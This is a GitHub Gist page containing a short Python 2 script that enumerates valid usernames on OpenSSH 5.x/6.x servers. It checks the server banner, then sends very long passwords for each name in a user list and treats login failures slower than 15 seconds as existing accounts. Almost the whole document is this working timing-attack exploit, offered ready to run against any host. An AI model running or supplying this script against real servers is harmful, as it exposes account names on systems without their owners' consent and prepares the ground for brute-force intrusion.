Created
August 24, 2016 21:08
-
-
Save llandeilocymro/d1d40a05d61ebbf599cbc6d103c6c461 to your computer and use it in GitHub Desktop.
OpenSSH Username enum
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# EDW - OpenSSH Username enum | |
import sys | |
import paramiko | |
import time | |
import optparse | |
import re | |
import signal | |
from socket import * | |
p = optparse.OptionParser("usage: %prog host user", version="%prog 0.2") | |
p.add_option("-H", "--host", dest="host", type="string", help="specify hostname to run on") | |
p.add_option("-u", "--userfile", dest="user", type="string", help="file of usernames") | |
p.add_option("-p", "--port", dest="port", type="int", default=22, help="port number, default is 22") | |
(options, args) = p.parse_args() | |
host = options.host | |
user = options.user | |
port = options.port | |
passw = 'A'*39000 | |
def main(): | |
timeStart = timeDone = 0 | |
s = socket(AF_INET, SOCK_STREAM) | |
s.connect((host, port)) | |
s.send("Cymru_am_byth") | |
data = s.recv(1024) | |
ndata = data.rstrip() | |
if not re.search(r"-OpenSSH_(5|6)",data): | |
print "This version (%s) is not vulnerable to the timing attack" %ndata | |
s.close() | |
exit() | |
else: | |
print "This version (%s) looks vulnerable, lets try......." %ndata | |
s.close() | |
try: | |
u = open(user).read().splitlines() | |
except IOError as e: | |
print "I/O error({0}): {1}".format(e.errno, e.strerror) | |
sys.exit() | |
for n in u: | |
try: | |
ssh = paramiko.SSHClient() | |
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) | |
tstart = int(time.time()) | |
ssh.connect(host,username=n,password=passw,port=port) | |
ssh.close() | |
except paramiko.BadAuthenticationType, e: | |
print e | |
sys.exit(1) | |
except paramiko.SSHException,e: | |
tdone = int(time.time()) | |
tres = tdone-tstart | |
if tres > 15: | |
print "[*] User %s exists on %s - %i" %(n,host,tres) | |
else: | |
print "User %s does not exist on %s - %i" %(n,host,tres) | |
def signal_handler(signal, frame): | |
print "\nCtrl+C pressed.. aborting..." | |
exit() | |
if __name__ == '__main__': | |
signal.signal(signal.SIGINT, signal_handler) | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment